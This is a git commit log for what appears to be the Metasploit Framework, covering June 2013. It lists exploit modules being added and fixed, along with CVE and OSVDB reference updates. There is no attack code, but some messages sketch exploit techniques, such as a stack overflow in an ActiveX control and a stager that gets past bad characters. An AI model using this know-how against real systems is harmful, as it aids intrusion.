Commit Graph

5293 Commits (5ff25d8b96d5b3497b65a7092be9bb6bb7ea871c)

Author SHA1 Message Date
sinn3r 7ef5695867 [FixRM:#8129] - Remove invalid metasploit.com references
These "metasploit.com" references aren't related to the vulns,
shouldn't be in them.
2013-07-03 11:52:10 -05:00
jvazquez-r7 c07e65d16e Improve and clean instantcms_exec 2013-07-03 11:37:57 -05:00
g0tmi1k 2a6056fd2a exploits/s4u_persistence~Fixed typos+default values 2013-07-03 00:38:50 +01:00
Ricardo Almeida dd876008f9 Update instantcms_exec.rb 2013-07-02 17:26:14 +01:00
jvazquez-r7 146d1eb27d Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-02 10:06:00 -05:00
jvazquez-r7 1110aefe49 Land #2038, @modpr0be exploit for ABBS Audio Media Player 2013-07-01 23:20:50 -05:00
modpr0be 2e5398470b remove additional junk, tested and not needed 2013-07-02 09:23:42 +07:00
jvazquez-r7 72f19181d1 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-07-01 16:38:19 -05:00
Ricardo Almeida dafa333e57 Update instantcms_exec.rb 2013-07-01 22:03:37 +01:00
Tod Beardsley bc24f99f8d Various description and title updates 2013-07-01 15:37:37 -05:00
modpr0be 9b8bfa6290 change last junk from rand_text_alpha_upper to rand_text 2013-07-01 23:49:19 +07:00
modpr0be c631778a38 make a nice way to fill the rest of buffer 2013-07-01 23:39:08 +07:00
Ricardo Almeida 760133d878 Error on line 60 2013-07-01 12:04:03 -04:00
sinn3r dbce1b36e5 Land #2036 - CVE-2013-3660
Thx Tavis, Keebie4e, and Meatballs
2013-07-01 10:55:51 -05:00
Ricardo Almeida 4cd08966ff added InstantCMS 1.6 PHP Code Injection 2013-07-01 11:44:47 -04:00
modpr0be 478beee38b remove unnecessary option and make msftidy happy 2013-07-01 18:51:47 +07:00
modpr0be f16d097c00 clean version, tested on winxp sp3 and win7 sp1 2013-07-01 18:35:50 +07:00
jvazquez-r7 f58f481399 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-30 22:36:46 -05:00
modpr0be e0ae71e874 minor fixing in the exploit module description 2013-07-01 03:27:06 +07:00
modpr0be 007fddb6bf remove SEH function, not needed 2013-07-01 03:13:20 +07:00
modpr0be 1e4b69ab03 Added abbs amp exploit module 2013-07-01 03:08:22 +07:00
jvazquez-r7 0ff1cd24a9 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-30 10:03:30 -05:00
jvazquez-r7 867eed7957 Make msftidy happy 2013-06-30 10:01:40 -05:00
jvazquez-r7 db00599d44 Move carberp_backdoor_exec to unix webapp exploits foler 2013-06-30 10:00:14 -05:00
Brian Wallace d990c7f21f Dat line 2013-06-29 09:46:36 -07:00
Brian Wallace ec7c9b039a Further refactoring requested 2013-06-29 09:45:22 -07:00
jvazquez-r7 a2b8daf149 Modify fail message when exploitation doen't success 2013-06-29 10:45:13 -05:00
jvazquez-r7 a5c3f4ca9b Modify ruby code according to comments 2013-06-29 08:54:00 -05:00
Brian Wallace 8542342ff6 Merge branch 'carberp_backdoor_exec' of git@github.com:bwall/metasploit-framework.git into carberp_backdoor_exec 2013-06-28 22:45:03 -07:00
Brian Wallace b8cada9ab0 Applied some refactoring to decrease line count 2013-06-28 22:44:23 -07:00
jvazquez-r7 427e26c4dc Fix current_pid 2013-06-28 21:36:49 -05:00
jvazquez-r7 32ae7ec2fa Fix error description and bad variable usage 2013-06-28 21:30:33 -05:00
jvazquez-r7 fb67002df9 Switch from print_error to print_warning 2013-06-28 21:29:20 -05:00
jvazquez-r7 3ab948209b Fix module according to @wchen-r7 feedback 2013-06-28 20:44:42 -05:00
jvazquez-r7 00416f3430 Add a new print_status 2013-06-28 18:23:49 -05:00
jvazquez-r7 7725937461 Add Module for cve-2013-3660 2013-06-28 18:18:21 -05:00
(B)rian (Wall)ace 9486364cc4 Added Steven K's email 2013-06-28 15:31:17 -07:00
Brian Wallace fe0e16183c Carberp backdoor eval PoC 2013-06-28 14:47:13 -07:00
jvazquez-r7 3c1af8217b Land #2011, @matthiaskaiser's exploit for cve-2013-2460 2013-06-26 14:35:22 -05:00
jvazquez-r7 81a2d9d1d5 Merge branch 'module_java_jre17_provider_skeleton' of https://github.com/matthiaskaiser/metasploit-framework 2013-06-26 14:32:59 -05:00
jvazquez-r7 90b30dc317 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-26 14:31:52 -05:00
William Vu e4fb5b327f Land #2028, update references for multiple modules 2013-06-26 10:18:27 -05:00
Steve Tornio 6ea622c45e reference updates 2013-06-26 09:44:56 -05:00
jvazquez-r7 7ab4d4dcc4 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-25 17:34:29 -05:00
James Lee 3e929fb812 Use fixed `write_file` instead of re-implementing 2013-06-25 17:25:14 -05:00
Steve Tornio 5b71013dde reference updates 2013-06-25 13:41:22 -05:00
jvazquez-r7 4fa789791d Explain Ranking 2013-06-25 13:10:15 -05:00
jvazquez-r7 127300c62d Fix also ruby module 2013-06-25 12:59:42 -05:00
jvazquez-r7 1ade467ac9 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-25 11:10:43 -05:00
jvazquez-r7 b32513b1b8 Fix CVE-2013-2171 with @jlee-r7 feedback 2013-06-25 10:40:55 -05:00
jvazquez-r7 3244013b1f Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-25 09:48:20 -05:00
jvazquez-r7 c9a7372f9f Land #2014, @wchen-r7's exploit for CVE-2013-2171 2013-06-25 09:33:56 -05:00
jvazquez-r7 0c306260be Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-25 09:13:01 -05:00
William Vu d6374ddfff Land #2020, CVE and OSVDB update 2013-06-25 08:17:54 -05:00
sinn3r 4df943d1a2 CVE and OSVDB update 2013-06-25 02:06:20 -05:00
jvazquez-r7 795dd6a02a Add module for OSVDB 93718 2013-06-24 23:51:28 -05:00
jvazquez-r7 e9fccb8dbd Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-24 22:07:48 -05:00
sinn3r 72847ee4c9 Land #2007 - Add local privilege escalation for ZPanel zsudo 2013-06-24 19:25:27 -05:00
jvazquez-r7 ca8ce363b8 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-24 16:32:55 -05:00
sinn3r d974e395e4 Add a check by checking uname 2013-06-24 15:54:41 -05:00
sinn3r 6b8e0605c0 Use FileDropper 2013-06-24 15:48:54 -05:00
HD Moore 24b7d19ecc Fix target regex and wfsdelay 2013-06-24 14:56:43 -05:00
jvazquez-r7 b86b4d955a Make random strings also length random 2013-06-24 12:01:30 -05:00
jvazquez-r7 98fddb6ce1 up to date 2013-06-24 11:57:11 -05:00
sinn3r 6780566a54 Add CVE-2013-2171: FreeBSD 9 Address Space Manipulation Module 2013-06-24 11:50:21 -05:00
jvazquez-r7 f7650a4b18 Fix wrong local variable 2013-06-24 11:35:26 -05:00
sinn3r b3d90c68a4 Land #2008 - More OSVDB refs 2013-06-24 01:53:29 -05:00
Matthias Kaiser 8a96b7f9f2 added Java7u21 RCE module
Click2Play bypass doesn't seem to work anymore.
2013-06-24 02:04:38 -04:00
jvazquez-r7 31fcb911f2 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-23 21:41:10 -05:00
Steve Tornio a920127f8c reference updates for several modules 2013-06-23 20:43:34 -05:00
sinn3r 5b0092ff39 Land #2006 - Ref updates 2013-06-23 18:26:48 -05:00
jvazquez-r7 6672679530 Add local privilege escalation for ZPanel zsudo abuse 2013-06-23 11:00:39 -05:00
jvazquez-r7 b49c4c4e9e up to date 2013-06-22 18:28:17 -05:00
jvazquez-r7 345773592f Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-22 13:54:47 -05:00
jvazquez-r7 04e6167f90 zpanel 2013-06-22 13:54:22 -05:00
jvazquez-r7 e9883fe5b9 Land #2005, @wchen-r7's exploit for ZPanel htpasswd 2013-06-22 13:24:23 -05:00
jvazquez-r7 2150d9efb0 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-22 12:06:18 -05:00
Steve Tornio 427f063c48 fix formatting 2013-06-22 07:32:29 -05:00
Steve Tornio 1e25dedb66 fix formatting 2013-06-22 07:31:47 -05:00
Steve Tornio 14850cd387 reference updates for multiple modules 2013-06-22 07:28:04 -05:00
sinn3r de659326ce Land #2003 - Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation 2013-06-21 21:52:32 -05:00
sinn3r 5de7fff685 Credit 2013-06-21 21:38:40 -05:00
sinn3r 339f2a5c83 Hmmm, one extra ',' 2013-06-21 21:29:17 -05:00
sinn3r 8d422c9a39 Forgot to randomize the fake pass and remove the payload during testing 2013-06-21 21:27:11 -05:00
sinn3r e7d75d6d16 Add OSVDB-94038: ZPanel htpasswd Module Username Command Execution 2013-06-21 21:03:10 -05:00
Markus Wulftange afa0e6c42a Use CmdStagerVBS instead of CmdStagerTFTP
By using `php.exe` as stager, the bad characters can be completely
bypassed. This allows the use of the CmdStagerVBS, which should be
working on all supported Windows systems.
2013-06-22 01:13:03 +02:00
jvazquez-r7 f106b6db50 Add comment with the component version 2013-06-21 17:38:30 -05:00
jvazquez-r7 5fe9a80bf0 Add module for OSVDB 46578 2013-06-21 17:31:40 -05:00
James Lee 2c12a43e77 Add a method for dealing with hardcoded URIs 2013-06-21 15:48:02 -05:00
jvazquez-r7 785639148c Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-20 17:18:42 -05:00
William Vu 4cc1f2440d Land #1996, references for several modules 2013-06-20 11:32:55 -05:00
Steve Tornio 322ba27f0f re-order refs 2013-06-20 11:17:23 -05:00
William Vu 22026352e6 Land #1995, OSVDB reference for Gitorious 2013-06-20 10:51:51 -05:00
William Vu e4cbd4b174 Land #1994, OSVDB reference for JBoss 2013-06-20 10:51:28 -05:00
Steve Tornio 66f4424202 fix formatting 2013-06-20 10:41:14 -05:00
Steve Tornio a3a5dec369 add osvdb ref 94441 2013-06-20 08:03:34 -05:00
Steve Tornio abea7e6a47 add osvdb ref 76389 2013-06-20 07:55:50 -05:00
Steve Tornio cab20062a4 add osvdb ref 84706 2013-06-20 07:38:34 -05:00
Steve Tornio a824a0583e add osvdb ref 89059 2013-06-20 07:34:15 -05:00
Steve Tornio 89f649ab99 add osvdb ref 89026 2013-06-20 07:28:29 -05:00
Steve Tornio 2b55e0e0a6 add osvdb ref 64171 2013-06-20 07:17:22 -05:00
Steve Tornio d19bd7a905 add osvdb 85739, cve 2012-5159, edb 21834 2013-06-20 07:01:59 -05:00
Steve Tornio 6cc7d9ccae add osvdb ref 85446 and edb ref 20500 2013-06-20 06:54:06 -05:00
Steve Tornio ee21120c04 add osvdb ref 85509 2013-06-20 06:47:10 -05:00
Steve Tornio ade970afb8 add osvdb ref 89322 2013-06-20 06:44:22 -05:00
Steve Tornio 42690a5c48 add osvdb ref 77492 2013-06-20 06:38:47 -05:00
Steve Tornio 0dca5ede7e add osvdb ref 78480 2013-06-20 06:07:08 -05:00
Steve Tornio 29bc169507 add osvdb ref 64171 2013-06-20 06:00:05 -05:00
sinn3r 8dfe9b5318 Add login feature 2013-06-20 04:16:23 -05:00
sinn3r ebde05b783 Improve check 2013-06-20 03:18:33 -05:00
sinn3r 20621d17de Add CVE-2013-3576 - HP System Management Homepage exploit 2013-06-20 03:08:42 -05:00
jvazquez-r7 fc7670fa5f Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-19 23:16:04 -05:00
jvazquez-r7 494ee160af Fix indent 2013-06-19 23:12:12 -05:00
jvazquez-r7 2d99c46414 Land #1990, @wchen-r7's exploit for Libretto CMS 2013-06-19 23:11:34 -05:00
sinn3r 079477c57d Commit final version 2013-06-19 20:35:24 -05:00
jvazquez-r7 869438cb73 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-19 19:57:40 -05:00
sinn3r 62b23bc594 Initial (incomplete) commit 2013-06-19 16:59:15 -05:00
James Lee 81b4efcdb8 Fix requires for PhpEXE
And incidentally fix some msftidy complaints
2013-06-19 16:27:59 -05:00
jvazquez-r7 6d1101b65b Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-19 12:14:53 -05:00
sinn3r d347be35e9 Land #1986 - Restores MoinMoin during exploitation 2013-06-19 12:14:10 -05:00
jvazquez-r7 a894dc83c2 Try restore also at exploiting time 2013-06-19 11:35:52 -05:00
sinn3r 7b0977f897 Change base path 2013-06-19 11:33:45 -05:00
sinn3r f0c81ed3cc Correct disclosure date 2013-06-19 03:00:32 -05:00
sinn3r 67593d6ef4 Eh, PHP, not "php" 2013-06-19 02:34:49 -05:00
sinn3r 9c3bd12613 If I can't write, I want to know.
It's possible that the upload directory doesn't allow write, the
module should be aware of that.  Other reasons may be possible.
2013-06-19 02:32:30 -05:00
sinn3r 19d868748d Final version 2013-06-19 02:21:01 -05:00
sinn3r 5c1822ea17 Initial commit for havalite module 2013-06-18 19:00:42 -05:00
jvazquez-r7 fd397db6e0 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-18 14:09:33 -05:00
sinn3r b514124997 Land #1979 - OSVDB update 2013-06-18 10:42:09 -05:00
sinn3r fbd16a2f3e Land #1978 - OSVDB update 2013-06-18 10:41:33 -05:00
sinn3r 1e46f7df48 Land #1977 - OSVDB update 2013-06-18 10:40:55 -05:00
sinn3r d0ed9a6687 Land #1976 - OSVDB update 2013-06-18 10:40:00 -05:00
jvazquez-r7 9e3053f24d Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-18 10:00:44 -05:00
jvazquez-r7 aa134b0bcc Land #1973, @wchen-r7's fix to handle ftp auth correctly 2013-06-18 09:34:55 -05:00
jvazquez-r7 2b46828d9c Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-18 08:27:18 -05:00
Steve Tornio e278ac5061 add osvdb ref 91841 2013-06-18 06:41:30 -05:00
Steve Tornio 404a9f0669 add osvdb ref 89594 2013-06-18 06:25:57 -05:00
Steve Tornio 27158d89c7 add osvdb ref 89105 2013-06-18 06:15:29 -05:00
Steve Tornio 2afc90a8de fix typos 2013-06-18 06:05:45 -05:00
Steve Tornio 2c3181b56b add osvdb ref 90627 2013-06-18 05:59:39 -05:00
sinn3r 070111a520 Land #1975 - Add CVE-2012-6081 (MoinMoin twikidraw Action Traversal) 2013-06-17 22:31:36 -05:00
sinn3r 3223ea799c An invalid WritablePage option can result the same message as well. 2013-06-17 22:30:44 -05:00
jvazquez-r7 ae1a3e3ca1 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-17 20:39:31 -05:00
jvazquez-r7 044bd2101f Authenticate against the page to modify 2013-06-17 20:34:02 -05:00
Tod Beardsley 4ca9a88324 Tidying up grammar and titles 2013-06-17 16:49:14 -05:00
jvazquez-r7 de1561363e Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-17 16:43:33 -05:00
jvazquez-r7 0bd6ca2a6a Add module for CVE-2012-6081 2013-06-17 16:13:55 -05:00
sinn3r 820f589df0 Missed this one. 2013-06-17 15:52:53 -05:00
sinn3r 163d3e771b Handle connect_login return value properly
Some modules ignore connect_login's return value, which may result
an EOF if send_cmd() is used later on.  All the modules fixed are
the ones require auth according to the module description, or
CVE/vendor/OSVDB info.
2013-06-17 15:48:34 -05:00
William Vu b51349ed77 Land #1968, OSVDB reference for ManageEngine 2013-06-17 10:30:05 -05:00
jvazquez-r7 8fac0aaf6b Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-17 08:24:39 -05:00
Steve Tornio e37a0b871f add osvdb ref 86562 2013-06-17 06:04:54 -05:00
Steve Tornio 6e57ecab59 add osvdb ref 79246 and edb ref 18492 2013-06-17 05:58:00 -05:00
Steve Tornio e17ccdda3a add osvdb ref 68662 2013-06-16 18:11:13 -05:00
jvazquez-r7 11bf17b0d6 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-15 11:55:22 -05:00
William Vu 0cf2751ec1 Land #1965, OSVDB reference for pBot 2013-06-15 07:39:25 -05:00
Steve Tornio d35dd73328 add osvdb ref 84913 2013-06-15 07:30:23 -05:00
William Vu 638175a6be Land #1964, OSVDB reference for StorageWorks 2013-06-15 07:27:43 -05:00
Steve Tornio 0c6157694f add osvdb ref 82087 2013-06-15 07:22:32 -05:00
Steve Tornio 6e8b844954 add osvdb ref 89611 2013-06-15 07:12:44 -05:00
Steve Tornio 63483a979d add osvdb ref 89611 2013-06-15 07:09:26 -05:00
William Vu bd17e67f75 Land #1960, lower ranking for MS13-009 2013-06-14 15:28:06 -05:00
sinn3r 2abf70a1ca Lower ranking for MS13-009
We haven't been able to make this one more reliable, so todb suggests
we lower the ranking first.
2013-06-14 15:24:43 -05:00
sinn3r d35c3469e8 Fix typo
EDB reference
2013-06-14 15:16:20 -05:00
jvazquez-r7 2d083be8e7 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-14 13:28:44 -05:00
sinn3r 0d384d23b8 Land #1954 - Fix resource_uri and mp4 file path 2013-06-14 13:15:17 -05:00
jvazquez-r7 060261bb3b Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-14 13:15:13 -05:00
sinn3r 933ac88b44 Missing the file param that's needed to download the mp4 2013-06-14 13:13:48 -05:00
sinn3r d2df3234f4 Land #1955 - mozilla_mchannel.rb undefined agent variable 2013-06-14 11:14:20 -05:00
sinn3r 223807d0df Land #1956 - fix regex error for mozilla_reduceright.rb 2013-06-14 11:09:49 -05:00
jvazquez-r7 86258e32b1 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-13 16:05:03 -05:00
sinn3r 0440c03c7a Land #1934 - Fix UltraISO Exploit File Creation 2013-06-13 13:57:09 -05:00
jvazquez-r7 95118895d6 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-13 13:05:42 -05:00
jvazquez-r7 81813a78fc Fix module Name 2013-06-13 11:55:23 -05:00
jvazquez-r7 707bc33148 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-13 10:17:28 -05:00
jvazquez-r7 eaba8e7b59 up to date 2013-06-12 15:44:00 -05:00
jvazquez-r7 afb2f83238 Add module for CVE-2012-1533 2013-06-12 14:40:53 -05:00
jvazquez-r7 0b9cf213df Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-12 12:03:10 -05:00
jvazquez-r7 c38eabe481 Fix description, code and perform test 2013-06-12 11:07:03 -05:00
jvazquez-r7 5c8053491f Add DEP bypass for ntdll ms12-001 2013-06-12 10:41:05 -05:00
jvazquez-r7 a1c7961cbc Suport js obfuscation for the trigger 2013-06-12 08:06:12 -05:00
jvazquez-r7 5240c6e164 Add module for MS13-037 CVE-2013-2551 2013-06-12 07:37:57 -05:00
Joe Vennix 45da645717 Update ff svg exploit description to be more accurate. 2013-06-11 12:12:18 -05:00
jvazquez-r7 9ea58ba165 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-11 10:40:01 -05:00
sinn3r 081baad68c Remove variable 'overflow' because it's not used
The 'overflow' variable isn't needed
2013-06-11 02:26:45 -05:00
Ruslaideemin ca0ab8d6ee maxthon_history_xcs.rb - fix User-agent string
request.headers['User-agent'] is incorrect, it should be
request.headers['User-Agent'].

Downloaded following version from oldapps.com to confirm
the exploit code is wrong.

Supported Systems Windows 98, 2000 (Maxthon 2.5.15 Build
  1000), XP, Vista, 7, 8
MD5 Checksum F3791637C886A46940876211209F82F4
SHA1 Checksum 039BB218245E5DC1BAB0F57298C68AC487F86323

Release Date 20 October, 2011 (2 years ago )
2013-06-11 13:37:21 +10:00
jvazquez-r7 69c25014ae Make msftidy happy 2013-06-13 18:58:38 -05:00
sinn3r 12801430e3 Update both ultraiso files to the right fix 2013-06-13 18:44:19 -05:00
Ruslaideemin 4e41e871bb mozilla_reduceright.rb - fix regex error.
[] is character class, and will match on 1, 6, 7, and |.
Where as (16|17) will match on either 16, or 17.

irb(main):053:0> y = /Firefox\/3\.6\.[16|17]/
=> /Firefox\/3\.6\.[16|17]/
irb(main):054:0> x = "Firefox/3.6.13"
=> "Firefox/3.6.13"
irb(main):055:0> x =~ y
=> 0
irb(main):056:0> y = /Firefox\/3\.6\.(16|17)/
=> /Firefox\/3\.6\.(16|17)/
irb(main):057:0> x =~ y
=> nil
2013-06-11 11:52:27 +10:00
Ruslaideemin 996171b35f mozilla_mchannel.rb undefined agent variable
If the TARGET is chosen instead of using the default
automatic, the agent variable will be undefined, which
causes the exploit to fail.
2013-06-11 10:43:47 +10:00
jvazquez-r7 72b871d762 up to date 2013-06-10 16:37:05 -05:00
Ruslaideemin d91b412661 adobe_flash_sps.rb - resource_uri vs get_resource
resource_uri will randomize the returned uri unless
datastore['URIPATH"] is set.

get_resource will return the currently used reosurce_uri

Since the incorrect type is used, this exploit is completely broken.

Tested fix with both URIPATH set to / and unset, and it works after
redirect.
2013-06-11 07:13:02 +10:00
jvazquez-r7 9c44ea0c61 up to date 2013-06-10 13:02:01 -05:00
jvazquez-r7 b20a38add4 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-10 12:22:52 -05:00
sinn3r 0895184e1f Land #1932 - Actually support OUTPUTPATH datastore option 2013-06-10 11:22:28 -05:00
Tod Beardsley f58e279066 Cleanup on module names, descriptions. 2013-06-10 10:52:22 -05:00
jvazquez-r7 cae5e871e7 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-08 23:24:39 -05:00
Ruslaideemin cd64e3593c Fix UltraISO file creation
This makes file creation where datastore['FILENAME'] is not used when
a different filename is required, and ends up creating files in the
wrong place.
2013-06-09 12:37:34 +10:00
Ruslaideemin c6b4290fea Fix UltraISO Exploit File Creation
Both ultraiso_ccd.rb and ultraiso_cue.rb use File.open to create
files, instead of using the create_file() function. This leads
to files being created in the wrong directory.

We work around this by dynamically changing the
file_format_filename function to return the corrected filename.
2013-06-09 09:51:15 +10:00
Ruslaideemin cb79aa252a Fix output path in ms10_004_textbytesatom.rb
ms10_004_textbytesatom.rb does not write to the local data directory,
instead it writes to the metasploit path (at least, that's where I
started msfrpcd).

This fixes it by using Msf::Config.local_directory
2013-06-09 07:28:48 +10:00
sinn3r f55edac0ca Title and description update 2013-06-07 22:38:53 -05:00
sinn3r a510084f1c Description change. 2013-06-07 22:35:46 -05:00
jvazquez-r7 600494817d Fix typo and target name 2013-06-07 21:08:38 -05:00
jvazquez-r7 9025b52951 make the payload build more clear 2013-06-07 18:05:11 -05:00
jvazquez-r7 d76e14fc9c Add module for OSVDB 93004 - Exim Dovect exec 2013-06-07 17:59:04 -05:00
jvazquez-r7 9d0047ff74 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-07 16:44:52 -05:00
sinn3r aefcc51704 Land #1924 - Java pwn2own 2013: java_jre17_driver_manager (CVE-2013-1488) 2013-06-07 15:12:09 -05:00
jvazquez-r7 79bfdf3ca6 Add comment to explain the applet delivery methods 2013-06-07 14:20:21 -05:00
jvazquez-r7 641fd3c6ce Add also the msf module 2013-06-07 13:39:19 -05:00
jvazquez-r7 9c27a294cb Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-07 13:01:37 -05:00
jvazquez-r7 a157e65802 Land #1916, @wchen-r7's exploit for Synactics PDF 2013-06-07 12:11:45 -05:00
sinn3r ea2895ac13 Change to AverageRanking
Just to play with the firing order for Browser Autopwn, this one
should fire as late as possible.
2013-06-07 12:08:51 -05:00
sinn3r 9c7b446532 Updates description about default browser setting 2013-06-07 11:58:31 -05:00
sinn3r f3421f2c3a Fix different landings 2013-06-07 10:26:04 -05:00
jvazquez-r7 0fb77cb4a7 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-07 08:44:07 -05:00
sinn3r da4b18c6a1 [FixRM:#8012] - Fix message data type to int
This patch makes sure s.message is actually an int, that way we can
properly stop or enable the service.
2013-06-06 23:49:14 -05:00
sinn3r e559824dc8 Remove whitespace 2013-06-06 20:08:50 -05:00
sinn3r d3e57ffc46 Add OSVDB-93754: Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow
This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX
component, specifically PDF_IN_1.ocx.  When a long string of data is given
to the ConnectToSynactis function, which is meant to be used for the ldCmdLine
argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry
class pointer saved on the stack, and results in arbitrary code execution under the
context of the user.
2013-06-06 20:05:08 -05:00
jvazquez-r7 ea2b7e623d Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-06 08:21:39 -05:00
Steve Tornio 4d26299de3 add osvdb ref 93881 and edb ref 21191 2013-06-05 18:57:33 -05:00
jvazquez-r7 e5a17ba227 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-05 09:41:23 -05:00
sinn3r 6d3dcf0cef Land #1912 - Fixed check for Admins SID in whoami /group output 2013-06-05 02:55:38 -05:00
sinn3r a3b25fd7c9 Land #1909 - Novell Zenworks Mobile Device Managment exploit & auxiliary 2013-06-05 02:45:45 -05:00
sinn3r 0c1d46c465 Add more references 2013-06-05 02:43:43 -05:00
sinn3r 46aa6d38f8 Add a check for it 2013-06-05 02:41:03 -05:00
sinn3r a270d37306 Take apart the version detection code 2013-06-05 02:34:35 -05:00
sinn3r 25fe03b981 People like this format better: IP:PORT - Message 2013-06-05 02:26:18 -05:00
sinn3r 02e29fff66 Make msftidy happy 2013-06-05 02:25:08 -05:00
sinn3r 35459f2657 Small name change, don't mind me 2013-06-05 02:18:11 -05:00
sinn3r 227fa4d779 Homie needs a default target 2013-06-05 02:16:59 -05:00
cbgabriel 1032663cd4 Fixed check for Administrators SID in whoami /group output 2013-06-04 18:34:06 -04:00
jvazquez-r7 b3a99affe0 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-04 12:07:27 -05:00
steponequit ed4766dc46 initial commit of novell mdm modules 2013-06-04 09:20:10 -07:00
jvazquez-r7 3111013991 Minor cleanup for miniupnpd_soap_bof 2013-06-04 08:53:52 -05:00
jvazquez-r7 6497e5c7a1 Move exploit under the linux tree 2013-06-04 08:53:18 -05:00
jvazquez-r7 0bf2f51622 Land #1843, @viris exploit for CVE-2013-0230 2013-06-04 08:52:09 -05:00
jvazquez-r7 86c768ad02 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-04 08:15:28 -05:00
Dejan Lukan 8ced3483de Deleted some undeeded comments and used the text_rand function rather than static values. 2013-06-04 08:44:47 +02:00
sinn3r ad87065b9a Land #1904 - Undefined variable 'path' in tomcat_deploy_mgr.rb 2013-06-04 01:35:13 -05:00
Ruslaideemin 71bc06d576 Fix undefined variable in tomcat_mgr_deploy.rb
Exploit failed (multi/http/tomcat_mgr_deploy): NameError undefined
local variable or method `path' for #<Msf...>
[06/04/2013 10:14:03] [d(3)] core: Call stack:
modules/exploits/multi/http/tomcat_mgr_deploy.rb:253:in `exploit'
lib/msf/core/exploit_driver.rb:205:in `job_run_proc'
lib/msf/core/exploit_driver.rb:166:in `run'
lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
lib/msf/ui/console/command_dispatcher/exploit.rb:111:in `cmd_exploit'
lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'
lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'
lib/rex/ui/text/dispatcher_shell.rb:383:in `each'
lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'
lib/rex/ui/text/shell.rb:200:in `run'
lib/msf/ui/web/console.rb:71:in `block in initialize'
lib/msf/core/thread_manager.rb💯in `call'
lib/msf/core/thread_manager.rb💯in `block in spawn'

Uses path instead of path_tmp in error messages.
2013-06-04 11:19:28 +10:00
jvazquez-r7 a5f9ed890b Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-03 16:23:12 -05:00
jvazquez-r7 30a019e422 Land #1891, @wchen-r7's improve for ie_cgenericelement_uaf 2013-06-03 15:35:43 -05:00
jvazquez-r7 4079484968 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-06-03 15:27:36 -05:00
Tod Beardsley 4cf682691c New module title and description fixes 2013-06-03 14:40:38 -05:00
sinn3r c705928052 Landing #1899 - Add OSVDB ref 85462 for esva_exec.rb 2013-06-03 10:40:31 -05:00
Steve Tornio 76faba60b7 add osvdb ref 85462 2013-06-03 06:16:43 -05:00
Steve Tornio e612a3d017 add osvdb ref 77183 2013-06-03 05:42:56 -05:00
Dejan Lukan df20e79375 Deleted the handle because it's not required and check() function. 2013-06-03 10:18:43 +02:00
Dejan Lukan 36f275d71a Changed the send_request_raw into send_request_cgi function. 2013-06-03 10:06:24 +02:00
Dejan Lukan 675fbb3045 Deleted the DoS UPnP modules, because they are not relevant to the current branch. 2013-06-03 09:45:29 +02:00
Dejan Lukan 1ceed1e44a Added corrected MiniUPnP module. 2013-06-03 09:37:04 +02:00
Dejan Lukan d656360c24 Added CVE-2013-0230 for MiniUPnPd 1.0 stack overflow vulnerability 2013-06-03 09:37:03 +02:00
Dejan Lukan 39e4573d86 Added CVE-2013-0229 for MiniUPnPd < 1.4 2013-06-03 09:37:03 +02:00
sinn3r e74c1d957f Landing #1897 - Add OSVDB ref 93444 for mutiny_frontend_upload.rb 2013-06-03 02:15:35 -05:00
sinn3r 093830d725 Landing #1896 - Add OSVDB ref 82925 for symantec_web_gateway_exec.rb 2013-06-03 02:13:34 -05:00
Steve Tornio c2c630c338 add osvdb ref 93444 2013-06-02 21:03:44 -05:00
Steve Tornio bc993b76fc add osvdb ref 82925 2013-06-02 20:43:16 -05:00
Steve Tornio ae17e9f7b5 add osvdb ref 56992 2013-06-02 18:32:46 -05:00
